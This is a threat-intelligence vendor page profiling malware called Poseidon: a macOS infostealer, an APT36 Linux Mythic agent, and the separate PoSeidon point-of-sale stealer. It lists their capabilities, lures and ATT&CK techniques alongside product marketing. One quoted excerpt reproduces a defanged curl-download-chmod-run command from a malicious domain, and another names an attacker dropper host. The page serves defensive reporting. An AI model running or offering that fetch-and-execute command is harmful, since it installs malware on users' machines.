Poseidon
Poseidon is a name used in multiple malware contexts in the provided content. Most prominently, it refers to a macOS infostealer, described as a fork of AMOS/Atomic macOS Stealer, that steals browser cookies, passwords, cryptocurrency wallet credentials, and other user data. Reported capabilities include theft from more than 160 cryptocurrency wallets, web browsers, Bitwarden, KeePassXC, FileZilla, and VPN configurations including Fortinet and OpenVPN. It has been distributed via malvertising, malicious ads, fake high-ranking websites, free/cracked software, and AppleScript-based fake prompts that mimic native macOS dialogs to steal credentials. The content states Poseidon was the most active infostealer on Mac in late 2024, accounting for 70% of macOS infostealer detections, and that Odyssey later emerged as its successor.
The name Poseidon is also used for a Linux backdoor/agent associated with the Mythic C2 framework. In that context, it is described as a Go-based backdoor used by Transparent Tribe/APT36 in campaigns targeting Indian government and defense-related entities, including BOSS Linux systems. Reported capabilities include data collection, long-term access, credential harvesting, file operations, and potential lateral movement. Related reporting places Poseidon in APT36’s Linux malware progression before AresRAT and DeskRAT. Separate supply-chain reporting states malicious npm packages such as eslint-verify-plugin dropped a Poseidon Mythic agent on Linux.
Additionally, the content includes references to PoSeidon, a distinct point-of-sale malware family targeting PoS terminals at restaurants, bars, and hotels in the U.S. That malware is described as scraping RAM for payment card track data and including keylogging functionality to capture usernames and passwords. Because the supplied object name is "poseidon," the most widely recognized display form in the provided material is "Poseidon," but the content clearly shows that this name is overloaded across unrelated malware families.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Tied together with six months of passive DNS, this is the fourth Linux-oriented RAT family APT36 has rotated through since mid-2024 (Poseidon → AresRAT → DeskRAT, alongside the parallel Windows CrimsonRAT track).
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques"Cybersecurity researchers have discovered four malicious NuGet packages... designed to target ASP.NET web application developers..." and "a malicious npm package named ambar-src..."
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks — a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks ... a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
...decoy PDF hosted on Google Drive...; users are redirected to these URLs through spear-phishing emails.
Execution
4 techniquesThe malware also establishes persistence by means of a cron job that executes the main payload automatically after a system reboot or process termination.
"Infostealers like Poseidon are abusing the AppleScript framework... to simulate prompts that mimic native Apple prompts, with the goal of stealing end user credentials."
The command that’s copied for macOS devices instructs the system to... curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update ... chmod +x /tmp/update ... Run the downloaded file /tmp/update.
weaponized .desktop shortcut files that, once opened, download and execute malicious payloads.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
2 techniquesThe current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks — a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
Credential Access
3 techniquesPoint-of-Sale (PoS) terminals have become an attractive target for hackers over the past year, reflected in the increasing number of RAM-scraping programs that steal payment card information from the memory of such systems.
The malicious code embedded into the packages comes with capabilities to siphon system information, access tokens, environment secrets, and API keys from developer environments... It also harvests API keys for nine large language models (LLM) providers.
The entire attack chain unfolds over two stages: a first-stage component that captures credentials and cryptocurrency keys and then loads a secondary stage that subsequently performs deeper harvesting of credentials from password managers.
Discovery
2 techniquesCommand and Control
1 techniqueThe shell script serves as a dropper to fetch a hex-encoded file from an attacker-controlled server ("securestore[.]cv") and save it to disk as an ELF binary...
Exfiltration
1 techniqueThese payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
IOCs tracked for this family
9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
15 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Linux ELF RAT family previously used by APT36 as part of its Linux implant evolution before AresRAT and DeskRAT.
A named stealer mentioned in the article as another macOS stealer in the ecosystem.
Mythic C2 agent referenced as being dropped by a rogue npm package (eslint-verify-plugin) on Linux/macOS systems.
Linux agent for the Mythic C2 framework used for post-exploitation, including file operations, credential harvesting, and lateral movement.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.